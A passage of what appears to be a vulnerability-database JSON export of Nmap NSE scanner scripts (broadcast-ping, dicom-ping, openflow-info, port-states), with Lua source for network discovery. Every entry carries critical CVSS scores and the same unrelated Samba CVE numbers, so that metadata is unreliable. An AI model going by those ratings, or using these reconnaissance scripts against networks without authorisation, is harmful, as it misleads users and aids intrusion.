<interface> [--ttl <ttl>] [--data-length <payload_length>]\n --script broadcast-ping [--script-args [broadcast-ping.timeout=<ms>],[num-probes=<n>]]\n \n\n## Script Output \n \n \n | broadcast-ping:\n | IP: 192.168.1.1 MAC: 00:23:69:2a:b1:25\n | IP: 192.168.1.106 MAC: 1c:65:9d:88:d8:36\n |_ Use --script-args=newtargets to add the results as targets\n \n \n\n## Requires \n\n * [coroutine](<>)\n * [ipOps](<../lib/ipOps.html>)\n * [nmap](<../lib/nmap.html>)\n * [packet](<../lib/packet.html>)\n * [stdnse](<../lib/stdnse.html>)\n * [tab](<../lib/tab.html>)\n * [string](<>)\n * [table](<>)\n * [target](<../lib/target.html>)\n * [rand](<../lib/rand.html>)\n\n* * *\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.0"}, "impactScore": 5.9}, "published": "2011-07-13T09:38:40", "type": "nmap", "title": "broadcast-ping NSE Script", "bulletinFamily": "scanner", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2012-1182", "CVE-2017-7494"], "modified": "2019-09-19T17:31:58", "id": "NMAP:BROADCAST-PING.NSE", "href": "https://nmap.org/nsedoc/scripts/broadcast-ping.html", "sourceData": "local coroutine = require \"coroutine\"\nlocal ipOps = require \"ipOps\"\nlocal nmap = require \"nmap\"\nlocal packet = require \"packet\"\nlocal stdnse = require \"stdnse\"\nlocal tab = require \"tab\"\nlocal string = require \"string\"\nlocal table = require \"table\"\nlocal target = require \"target\"\nlocal rand = require \"rand\"\n\n\ndescription = [[\nSends broadcast pings on a selected interface using raw ethernet packets and\noutputs the responding hosts' IP and MAC addresses or (if requested) adds them\nas targets. Root privileges on UNIX are required to run this script since it\nuses raw sockets. Most operating systems don't respond to broadcast-ping\nprobes, but they can be configured to do so.\n\nThe interface on which is broadcasted can be specified using the -e Nmap option\nor the <code>broadcast-ping.interface</code> script-arg. If no interface is\nspecified this script broadcasts on all ethernet interfaces which have an IPv4\naddress defined.\n\nThe <code>newtarget</code> script-arg can be used so the script adds the\ndiscovered IPs as targets.\n\nThe timeout of the ICMP probes can be specified using the <code>timeout</code>\nscript-arg. The default timeout is 3000 ms. A higher number might be necessary\nwhen scanning across larger networks.\n\nThe number of sent probes can be specified using the <code>num-probes</code>\nscript-arg. The default number is 1. A higher value might get more results on\nlarger networks.\n\nThe ICMP probes sent comply with the --ttl and --data-length Nmap options, so\nyou can use those to control the TTL(time to live) and ICMP payload length\nrespectively. The default value for TTL is 64, and the length of the payload\nis 0. The payload is consisted of random bytes.\n]]\n\n---\n-- @usage\n-- nmap -e <interface> [--ttl <ttl>] [--data-length <payload_length>]\n-- --script broadcast-ping [--script-args [broadcast-ping.timeout=<ms>],[num-probes=<n>]]\n--\n-- @args broadcast-ping.interface string specifying which interface to use for this script (default all interfaces)\n-- @args broadcast-ping.num_probes number specifying how many ICMP probes should be sent (default 1)\n-- @args broadcast-ping.timeout timespec specifying how long to wait for response (default 3s)\n--\n-- @output\n-- | broadcast-ping:\n-- | IP: 192.168.1.1 MAC: 00:23:69:2a:b1:25\n-- | IP: 192.168.1.106 MAC: 1c:65:9d:88:d8:36\n-- |_ Use --script-args=newtargets to add the results as targets\n--\n--\n\nauthor = \"Gorjan Petrovski\"\nlicense = \"Same as Nmap--See https://nmap.org/book/man-legal.html\"\ncategories = {\"discovery\",\"safe\",\"broadcast\"}\n\n\nprerule = function()\n if not nmap.is_privileged() then\n nmap.registry[SCRIPT_NAME] = nmap.registry[SCRIPT_NAME] or {}\n if not nmap.registry[SCRIPT_NAME].rootfail then\n stdnse.verbose1(\"not running for lack of privileges.\")\n end\n nmap.registry[SCRIPT_NAME].rootfail = true\n return nil\n end\n\n if nmap.address_family() ~= 'inet' then\n stdnse.debug1(\"is IPv4 compatible only.\")\n return false\n end\n\n return true\nend\n\n\n--- ICMP packet crafting\n--\n-- @param srcIP string containing the source IP, IPv4 format\n-- @param dstIP string containing the destination IP, IPv4 format\n-- @param ttl number containing value for the TTL (time to live) field in IP header\n-- @param data_length number value of ICMP payload length\nlocal icmp_packet = function(srcIP, dstIP, ttl, data_length, mtu, seqNo, icmp_id)\n -- A couple of checks first\n assert((seqNo and seqNo>0 and seqNo<=0xffff),\"ICMP Sequence number: Value out of range(1-65535).\")\n assert((ttl and ttl>0 and ttl<0xff),\"TTL(time-to-live): Value out of range(1-256).\")\n -- MTU values should be considered here!\n assert((data_length and data_length>=0 and data_length<mtu),\"ICMP Payload length: Value out of range(0-mtu).\")\n\n -- ICMP Message\n local icmp_payload = nil\n if data_length and data_length>0 then\n icmp_payload = rand.random_string(data_length)\n else\n icmp_payload = \"\"\n end\n\n -- Type=08; Code=00; Chksum=0000; ID=icmp_id; SeqNo=icmp_seqNo; Payload=icmp_payload(hex string);\n local icmp_msg = string.pack(\">BBI2\", 8, 0, 0) .. icmp_id .. string.pack(\"I2\", seqNo) .. icmp_payload\n\n local icmp_checksum = packet.in_cksum(icmp_msg)\n\n icmp_msg = string.pack(\">BBI2\", 8, 0, icmp_checksum) .. icmp_id .. string.pack(\"I2\", seqNo) .. icmp_payload\n\n\n --IP header\n local ip_bin = \"\\x45\\x00\" .. -- IPv4, no options, no DSCN, no ECN\n string.pack(\">I2I2\",\n 20 + #icmp_msg, -- total length\n 0) -- IP ID\n .. \"\\x40\\x00\" -- DF\n .. string.pack(\"BB\",\n ttl,\n 1 -- ICMP\n )\n .. (\"\\0\"):rep(10) -- checksum & addresses\n\n -- IP+ICMP; Addresses and checksum need to be filled\n local icmp_bin = ip_bin .. icmp_msg\n\n --Packet\n local icmp = packet.Packet:new(icmp_bin,#icmp_bin)\n assert(icmp,\"Mistake during ICMP packet parsing\")\n\n icmp:ip_set_bin_src(ipOps.ip_to_str(srcIP))\n icmp:ip_set_bin_dst(ipOps.ip_to_str(dstIP))\n icmp:ip_count_checksum()\n\n return icmp\nend\n\nlocal broadcast_if = function(if_table,icmp_responders)\n local condvar = nmap.condvar(icmp_responders)\n\n local num_probes = tonumber(stdnse.get_script_args(SCRIPT_NAME .. \".num-probes\")) or 1\n\n local timeout = stdnse.parse_timespec(stdnse.get_script_args(SCRIPT_NAME .. \".timeout\"))\n timeout = (timeout or 3) * 1000\n\n local ttl = nmap.get_ttl()\n\n local data_length = nmap.get_payload_length()\n local sequence_number = 1\n local destination_IP = \"255.255.255.255\"\n\n -- raw IPv4 socket\n local dnet = nmap.new_dnet()\n local try = nmap.new_try()\n try = nmap.new_try(function() dnet:ethernet_close() end)\n\n -- raw sniffing socket (icmp echoreply style)\n local pcap = nmap.new_socket()\n pcap:set_timeout(timeout)\n\n local mtu = if_table.mtu or 256 -- 256 is minimal mtu\n\n pcap:pcap_open(if_table.device, 104, false, \"dst host \".. if_table.address ..\n \" and icmp[icmptype]==icmp-echoreply\")\n try(dnet:ethernet_open(if_table.device))\n\n local source_IP = if_table.address\n\n local icmp_ids = {}\n\n for i = 1, num_probes do\n -- ICMP packet\n local icmp_id = rand.random_string(2)\n icmp_ids[icmp_id]=true\n local icmp = icmp_packet( source_IP, destination_IP, ttl,\n data_length, mtu, sequence_number, icmp_id)\n\n local ethernet_icmp = (\n \"\\xFF\\xFF\\xFF\\xFF\\xFF\\xFF\" -- dst mac\n .. if_table.mac -- src mac\n .. \"\\x08\\x00\" -- ethertype IPv4\n .. icmp.buf -- data\n )\n\n try( dnet:ethernet_send(ethernet_icmp) )\n end\n\n while true do\n local status, plen, l2, l3data, _ = pcap:pcap_receive()\n if not status then break end\n\n -- Do stuff with packet\n local icmpreply = packet.Packet:new(l3data,plen,false)\n -- We check whether the packet is parsed ok, and whether the ICMP ID of the sent packet\n -- is the same with the ICMP ID of the received packet. We don't want ping probes interfering\n local icmp_id = icmpreply:raw(icmpreply.icmp_offset+4,2)\n if icmpreply:ip_parse() and icmp_ids[icmp_id] then\n if not icmp_responders[icmpreply.ip_src] then\n -- [key = IP]=MAC\n local mac_pretty = stdnse.format_mac(l2:sub(7,12))\n icmp_responders[icmpreply.ip_src] = mac_pretty\n end\n else\n stdnse.debug1(\"Erroneous ICMP packet received; Cannot parse IP header.\")\n end\n end\n\n pcap:close()\n dnet:ethernet_close()\n\n condvar \"signal\"\nend\n\n\naction = function()\n\n --get interface script-args, if any\n local interface_arg = stdnse.get_script_args(SCRIPT_NAME .. \".interface\")\n local interface_opt = nmap.get_interface()\n\n -- interfaces list (decide which interfaces to broadcast on)\n local interfaces ={}\n if interface_opt or interface_arg then\n -- single interface defined\n local interface = interface_opt or interface_arg\n local if_table = nmap.get_interface_info(interface)\n if not (if_table and if_table.address and if_table.link==\"ethernet\") then\n stdnse.debug1(\"Interface not supported or not properly configured.\")\n return false\n end\n table.insert(interfaces, if_table)\n else\n local tmp_ifaces = nmap.list_interfaces()\n for _, if_table in ipairs(tmp_ifaces) do\n if if_table.address and\n if_table.link==\"ethernet\" and\n if_table.address:match(\"%d+%.%d+%.%d+%.%d+\") then\n table.insert(interfaces, if_table)\n end\n end\n end\n\n if #interfaces == 0 then\n stdnse.debug1(\"No interfaces found.\")\n return\n end\n\n local icmp_responders={}\n local threads ={}\n local condvar = nmap.condvar(icmp_responders)\n\n -- party time\n for _, if_table in ipairs(interfaces) do\n -- create a thread for each interface\n local co = stdnse.new_thread(broadcast_if, if_table, icmp_responders)\n threads[co]=true\n end\n\n repeat\n for thread in pairs(threads) do\n if coroutine.status(thread) == \"dead\" then threads[thread] = nil end\n end\n if ( next(threads) ) then\n condvar \"wait\"\n end\n until next(threads) == nil\n\n -- generate output\n local output = tab.new()\n for ip_addr, mac_addr in pairs(icmp_responders) do\n if target.ALLOW_NEW_TARGETS then\n target.add(ip_addr)\n end\n tab.addrow(output, \"IP: \" .. ip_addr, \"MAC: \" .. mac_addr)\n end\n if #output > 0 then\n output = { tab.dump(output) }\n if not target.ALLOW_NEW_TARGETS then\n output[#output + 1] = \"Use --script-args=newtargets to add the results as targets\"\n end\n return stdnse.format_output(true, output)\n end\nend\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-02-15T21:46:07", "description": "Attempts to discover DICOM servers (DICOM Service Provider) through a partial C-ECHO request. It also detects if the server allows any called Application Entity Title or not. \n\nThe script responds with the message \"Called AET check enabled\" when the association request is rejected due configuration. This value can be bruteforced. \n\nC-ECHO requests are commonly known as DICOM ping as they are used to test connectivity. Normally, a 'DICOM ping' is formed as follows: \n\n * Client -> A-ASSOCIATE request -> Server \n * Server -> A-ASSOCIATE ACCEPT/REJECT -> Client \n * Client -> C-ECHO request -> Server \n * Server -> C-ECHO response -> Client \n * Client -> A-RELEASE request -> Server \n * Server -> A-RELEASE response -> Client \n\nFor this script we only send the A-ASSOCIATE request and look for the success code in the response as it seems to be a reliable way of detecting DICOM servers.\n\n## Script Arguments \n\n#### dicom.called_aet, dicom.calling_aet \n\nSee the documentation for the [dicom](<../lib/dicom.html#script-args>) library. \n\n## Example Usage \n\n * nmap -p4242 --script dicom-ping <target>\n\n * nmap -sV --script dicom-ping <target>\n \n\n## Script Output \n \n \n PORT STATE SERVICE REASON\n 4242/tcp open dicom syn-ack\n | dicom-ping: \n | dicom: DICOM Service Provider discovered!\n |_ config: Called AET check enabled\n \n\n## Requires \n\n * [shortport](<../lib/shortport.html>)\n * [dicom](<../lib/dicom.html>)\n * [stdnse](<../lib/stdnse.html>)\n * [nmap](<../lib/nmap.html>)\n\n* * *\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.0"}, "impactScore": 5.9}, "published": "2019-08-05T06:30:36", "type": "nmap", "title": "dicom-ping NSE Script", "bulletinFamily": "scanner", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2012-1182", "CVE-2017-7494"], "modified": "2020-08-21T19:32:08", "id": "NMAP:DICOM-PING.NSE", "href": "https://nmap.org/nsedoc/scripts/dicom-ping.html", "sourceData": "description = [[\nAttempts to discover DICOM servers (DICOM Service Provider) through a partial C-ECHO request.\n It also detects if the server allows any called Application Entity Title or not.\n\nThe script responds with the message \"Called AET check enabled\" when the association request\n is rejected due configuration. This value can be bruteforced.\n\nC-ECHO requests are commonly known as DICOM ping as they are used to test connectivity.\nNormally, a 'DICOM ping' is formed as follows:\n* Client -> A-ASSOCIATE request -> Server\n* Server -> A-ASSOCIATE ACCEPT/REJECT -> Client\n* Client -> C-ECHO request -> Server\n* Server -> C-ECHO response -> Client\n* Client -> A-RELEASE request -> Server\n* Server -> A-RELEASE response -> Client\n\nFor this script we only send the A-ASSOCIATE request and look for the success code\n in the response as it seems to be a reliable way of detecting DICOM servers.\n]]\n\n---\n-- @usage nmap -p4242 --script dicom-ping <target>\n-- @usage nmap -sV --script dicom-ping <target>\n-- \n-- @output\n-- PORT STATE SERVICE REASON\n-- 4242/tcp open dicom syn-ack\n-- | dicom-ping: \n-- | dicom: DICOM Service Provider discovered!\n-- |_ config: Called AET check enabled\n--\n-- @xmloutput\n-- <script id=\"dicom-ping\" output=\"
 dicom: DICOM Service Provider discovered!
\n-- config: Called AET check enabled\"><elem key=\"dicom\">DICOM Service Provider discovered!</elem>\n-- <elem key=\"config\">Called AET check enabled</elem>\n-- </script>\n---\n\nauthor = \"Paulino Calderon <calderon()calderonpale.com>\"\nlicense = \"Same as Nmap--See https://nmap.org/book/man-legal.html\"\ncategories = {\"discovery\", \"default\", \"safe\", \"auth\"}\n\nlocal shortport = require \"shortport\"\nlocal dicom = require \"dicom\"\nlocal stdnse = require \"stdnse\"\nlocal nmap = require \"nmap\"\n\nportrule = shortport.port_or_service({104, 2345, 2761, 2762, 4242, 11112}, \"dicom\", \"tcp\", \"open\")\n\naction = function(host, port)\n local output = stdnse.output_table()\n local dcm_conn_status, err = dicom.associate(host, port)\n if dcm_conn_status == false then\n stdnse.debug1(\"Association failed:%s\", err)\n if err == \"ASSOCIATE REJECT received\" then\n port.version.name = \"dicom\"\n nmap.set_port_version(host, port)\n \n output.dicom = \"DICOM Service Provider discovered!\"\n output.config = \"Called AET check enabled\"\n end\n return output\n end\n port.version.name = \"dicom\"\n nmap.set_port_version(host, port)\n \n output.dicom = \"DICOM Service Provider discovered!\"\n output.config = \"Any AET is accepted (Insecure)\"\n return output\nend\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-02-15T09:39:21", "description": "Queries OpenFlow controllers for information. Newer versions of the OpenFlow protocol (1.3 and greater) will return a list of all protocol versions supported by the controller. Versions prior to 1.3 only return their own version number. \n\nFor additional information: \n\n * <https://www.opennetworking.org/images/stories/downloads/sdn-resources/onf-specifications/openflow/openflow-switch-v1.5.0.noipr.pdf>\n\n## Example Usage \n \n \n nmap -p 6633,6653 --script openflow-info <target>\n\n## Script Output \n \n \n PORT STATE SERVICE REASON\n 6653/tcp open openflow\n | openflow-info:\n | OpenFlow Running Version: 1.5.X\n | OpenFlow Versions Supported:\n | 1.0\n | 1.1\n | 1.2\n | 1.3.X\n | 1.4.X\n |_ 1.5.X\n\n## Requires \n\n * [comm](<../lib/comm.html>)\n * [shortport](<../lib/shortport.html>)\n * [stdnse](<../lib/stdnse.html>)\n * [string](<>)\n * [match](<../lib/match.html>)\n * [table](<>)\n\n* * *\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.0"}, "impactScore": 5.9}, "published": "2020-10-19T17:13:23", "type": "nmap", "title": "openflow-info NSE Script", "bulletinFamily": "scanner", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2012-1182", "CVE-2017-7494"], "modified": "2020-10-19T17:13:23", "id": "NMAP:OPENFLOW-INFO.NSE", "href": "https://nmap.org/nsedoc/scripts/openflow-info.html", "sourceData": "local comm = require \"comm\"\nlocal shortport = require \"shortport\"\nlocal stdnse = require \"stdnse\"\nlocal string = require \"string\"\nlocal match = require \"match\"\nlocal table = require \"table\"\n\ndescription = [[\nQueries OpenFlow controllers for information. Newer versions of the OpenFlow\nprotocol (1.3 and greater) will return a list of all protocol versions supported\nby the controller. Versions prior to 1.3 only return their own version number.\n\nFor additional information:\n* https://www.opennetworking.org/images/stories/downloads/sdn-resources/onf-specifications/openflow/openflow-switch-v1.5.0.noipr.pdf\n]]\n\n---\n-- @usage nmap -p 6633,6653 --script openflow-info <target>\n-- @output\n-- PORT STATE SERVICE REASON\n-- 6653/tcp open openflow\n-- | openflow-info:\n-- | OpenFlow Running Version: 1.5.X\n-- | OpenFlow Versions Supported:\n-- | 1.0\n-- | 1.1\n-- | 1.2\n-- | 1.3.X\n-- | 1.4.X\n-- |_ 1.5.X\n\nauthor = {\"Jay Smith\", \"Mak Kolybabi <mak@kolybabi.com>\"}\nlicense = \"Same as Nmap--See https://nmap.org/book/man-legal.html\"\ncategories = {\"default\", \"safe\"}\n\n-- OpenFlow versions released:\n-- 0x01 = 1.0\n-- 0x02 = 1.1\n-- 0x03 = 1.2\n-- 0x04 = 1.3.X\n-- 0x05 = 1.4.X\n-- 0x06 = 1.5.X\n-- The bits in the version bitmap are indexed by the ofp version number of the\n-- protocol. If the bit identified by the number of left bitshift equal\n-- to a ofp version number is set, this OpenFlow version is supported.\nlocal openflow_versions = {\n [0x02] = \"1.0\",\n [0x04] = \"1.1\",\n [0x08] = \"1.2\",\n [0x10] = \"1.3.X\",\n [0x20] = \"1.4.X\",\n [0x40] = \"1.5.X\"\n}\n\nlocal OPENFLOW_HEADER_SIZE = 8\nlocal OFPT_HELLO = 0\nlocal OFPHET_VERSIONBITMAP = 1\n\nportrule = shortport.version_port_or_service({6633, 6653}, \"openflow\", \"tcp\")\n\nreceive_message = function(host, port)\n local hello = string.pack(\n \">I1 I1 I2 I4\",\n 0x04,\n OFPT_HELLO,\n OPENFLOW_HEADER_SIZE,\n 0xFFFFFFFF\n )\n\n -- Handshake Info:\n -- Versions 1.3.1 and later say hello with a bitmap of versions supported\n -- Earlier versions either say hello without the bitmap.\n -- Some implementations are shy and don't make the first move, so we'll say\n -- hello first. We'll pretend to be a switch using version 1.0 of the protocol\n local socket, response = comm.tryssl(host, port, hello, {bytes = OPENFLOW_HEADER_SIZE})\n if not socket then\n stdnse.debug1(\"Failed to connect to service: %s\", response)\n return\n end\n\n if #response < OPENFLOW_HEADER_SIZE then\n socket:close()\n stdnse.debug1(\"Initial packet received was %d bytes, need >= %d bytes.\", #response, OPENFLOW_HEADER_SIZE)\n return\n end\n\n -- The first byte is the protocol version number being used. So long as that\n -- number is less than the currently-published versions, then we can be\n -- confident in our parsing of the packet.\n local pos = 1\n local message = {}\n local message_version, pos = string.unpack(\">I1\", response, 1)\n if message_version > 0x06 then\n socket:close()\n stdnse.debug1(\"Initial packet received had unrecognized version %d.\", message_version)\n return\n end\n message.version = message_version\n\n -- The second byte is the packet type.\n local message_type, pos = string.unpack(\">I1\", response, pos)\n message.type = message_type\n\n -- The fourth and fifth bytes are the length of the entire message, including\n -- the header and length itself.\n local message_length, pos = string.unpack(\">I2\", response, pos)\n if message_length < OPENFLOW_HEADER_SIZE then\n socket:close()\n stdnse.debug1(\"Response declares length as %d bytes, need >= %d bytes.\", message_length, OPENFLOW_HEADER_SIZE)\n return\n end\n message.length = message_length\n\n -- The remainder of the header contains the ID.\n local message_id, pos = string.unpack(\">I4\", response, pos)\n message.id = message_id\n\n -- All remaining data from the response, up until the message length, is the body.\n assert(pos == OPENFLOW_HEADER_SIZE + 1)\n message.body = response:sub(pos, message_length)\n\n -- If we have the whole packet, pass it up the call stack.\n if message_length <= #response then\n socket:close()\n return message\n end\n\n -- If message length is larger than the data we already have, receive the\n -- remainder of the packet.\n local missing_bytes = message_length - #response\n local status, body = socket:receive_buf(match.numbytes(missing_bytes), true)\n if not status then\n socket:close()\n stdnse.debug1(\"Failed to receive missing %d bytes of response: %s\", missing_bytes, body)\n return\n end\n message.body = (response .. body):sub(pos, message_length)\n\n return message\nend\n\nretrieve_version_bitmap = function(message)\n -- HELLO message structure:\n -- /* OFPT_HELLO. This message includes zero or more hello elements having\n -- * variable size. Unknown elements types must be ignored/skipped, to allow\n -- * for future extensions. */\n -- struct ofp_hello {\n -- struct ofp_header header;\n -- /* Hello element list */\n -- struct ofp_hello_elem_header elements[0]; /* List of elements - 0 or more */\n -- };\n -- The HELLO message may contain zero or more hello elements. One of these\n -- hello elements may be of the type OFPHET_VERSIONBITMAP. We must search\n -- through elements until we find OFPHET_VERSIONBITMAP.\n -- Note: As of version 1.5, OFPHET_VERSIONBITMAP is the only standard hello element type.\n -- However, we can not assume that this will be the case for long.\n local pos = 1\n local body = message.body\n while pos + 4 < #body - 1 do\n local element_length, element_type\n element_type, element_length, pos = string.unpack(\">I2 I2\", body, pos)\n if pos + element_length < #body then\n stdnse.debug1(\"Ran out of data parsing element type %d at position %d.\", element_type, pos)\n return\n end\n\n if element_type == OFPHET_VERSIONBITMAP then\n return string.unpack(\">I4\", body, pos)\n end\n\n pos = pos + element_length - 4\n end\n\n return\nend\n\naction = function(host, port)\n local output = stdnse.output_table()\n\n local message = receive_message(host, port)\n if not message then\n return\n end\n\n output[\"OpenFlow Version Running\"] = openflow_versions[2 ^ message.version]\n if message.type ~= OFPT_HELLO then\n return output\n end\n\n local version_bitmap = retrieve_version_bitmap(message)\n if not version_bitmap then\n return output\n end\n\n local supported_versions = {}\n for mask, version in pairs(openflow_versions) do\n if mask & version_bitmap then\n table.insert(supported_versions, version)\n end\n end\n table.sort(supported_versions)\n output[\"OpenFlow Versions Supported\"] = supported_versions\n\n return output\nend\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-02-15T09:38:11", "description": "Prints a list of ports found in each state. \n\nNmap ordinarily summarizes \"uninteresting\" ports as \"Not shown: 94 closed ports, 4 filtered ports\" but users may want to know which ports were filtered vs which were closed. This script will expand these summaries into a list of ports and port ranges that were found in each state.\n\n## Example Usage \n \n \n nmap -sV --script=port-states <target>\n\n## Script Output \n \n \n Host script results:\n | port-states:\n | tcp:\n | open: 22,631\n | closed: 7,9,13,21,23,25-26,37,53,79-81,88,106,110-111,113,119,135,139,143-144,179,199,389,427,443-445,465,513-515,543-544,548,554,587,646,873,990,993,995,1025-1029,1110,1433,1720,1723,1755,1900,2000-2001,2049,2121,2717,3000,3128,3306,3389,3986,4899,5000,5009,5051,5060,5101,5190,5357,5432,5631,5666,5800,5900,6000-6001,6646,7070,8000,8008-8009,8080-8081,8443,8888,9100,9999-10000,32768,49152,9,17,19,49,53,67,69,80,88,111,120,123,135-139,158,161-162,177,427,443,445,497,500,514-515,518,520,593,623,626,996-999,1022-1023,1025-1030,1433-1434,1645-1646,1701,1718-1719,1812-1813,1900,2000,2048-2049,2222-2223,3283,3456,3703,4444,4500,5000,5060,5632,9200,10000,17185,20031,30718,31337,32768-32769,32771,32815,33281,49152-49154,49156,49181-49182,49185-49186,49188,49190-49194,49200-49201,65024\n | udp:\n | open|filtered: 68,631,5353\n |_ closed: 7,9,17,19,49,53,67,69,80,88,111,120,123,135-139,158,161-162,177,427,443,445,497,500,514-515,518,520,593,623,626,996-999,1022-1023,1025-1030,1433-1434,1645-1646,1701,1718-1719,1812-1813,1900,2000,2048-2049,2222-2223,3283,3456,3703,4444,4500,5000,5060,5632,9200,10000,17185,20031,30718,31337,32768-32769,32771,32815,33281,49152-49154,49156,49181-49182,49185-49186,49188,49190-49194,49200-49201,65024\n \n\n## Requires \n\n * [table](<>)\n * [nmap](<../lib/nmap.html>)\n * [stdnse](<../lib/stdnse.html>)\n\n* * *\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.0"}, "impactScore": 5.9}, "published": "2020-11-16T21:41:46", "type": "nmap", "title": "port-states NSE Script", "bulletinFamily": "scanner", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2012-1182", "CVE-2017-7494"], "modified": "2020-11-16T21:41:46", "id": "NMAP:PORT-STATES.NSE", "href": "https://nmap.org/nsedoc/scripts/port-states.html", "sourceData": "local table = require \"table\"\nlocal nmap = require \"nmap\"\nlocal stdnse = require \"stdnse\"\n\ndescription = [[\nPrints a list of ports found in each state.\n\nNmap ordinarily summarizes \"uninteresting\" ports as \"Not shown: 94 closed\nports, 4 filtered ports\" but users may want to know which ports were filtered\nvs which were closed. This script will expand these summaries into a list of\nports and port ranges that were found in each state.\n]]\n\n---\n-- @output\n-- Host script results:\n-- | port-states:\n-- | tcp:\n-- | open: 22,631\n-- | closed: 7,9,13,21,23,25-26,37,53,79-81,88,106,110-111,113,119,135,139,143-144,179,199,389,427,443-445,465,513-515,543-544,548,554,587,646,873,990,993,995,1025-1029,1110,1433,1720,1723,1755,1900,2000-2001,2049,2121,2717,3000,3128,3306,3389,3986,4899,5000,5009,5051,5060,5101,5190,5357,5432,5631,5666,5800,5900,6000-6001,6646,7070,8000,8008-8009,8080-8081,8443,8888,9100,9999-10000,32768,49152,9,17,19,49,53,67,69,80,88,111,120,123,135-139,158,161-162,177,427,443,445,497,500,514-515,518,520,593,623,626,996-999,1022-1023,1025-1030,1433-1434,1645-1646,1701,1718-1719,1812-1813,1900,2000,2048-2049,2222-2223,3283,3456,3703,4444,4500,5000,5060,5632,9200,10000,17185,20031,30718,31337,32768-32769,32771,32815,33281,49152-49154,49156,49181-49182,49185-49186,49188,49190-49194,49200-49201,65024\n-- | udp:\n-- | open|filtered: 68,631,5353\n-- |_ closed: 7,9,17,19,49,53,67,69,80,88,111,120,123,135-139,158,161-162,177,427,443,445,497,500,514-515,518,520,593,623,626,996-999,1022-1023,1025-1030,1433-1434,1645-1646,1701,1718-1719,1812-1813,1900,2000,2048-2049,2222-2223,3283,3456,3703,4444,4500,5000,5060,5632,9200,10000,17185,20031,30718,31337,32768-32769,32771,32815,33281,49152-49154,49156,49181-49182,49185-49186,49188,49190-49194,49200-49201,65024\n--\n-- @xmloutput\n-- <table key=\"tcp\">\n-- <elem key=\"open\">22,631</elem>\n-- <elem 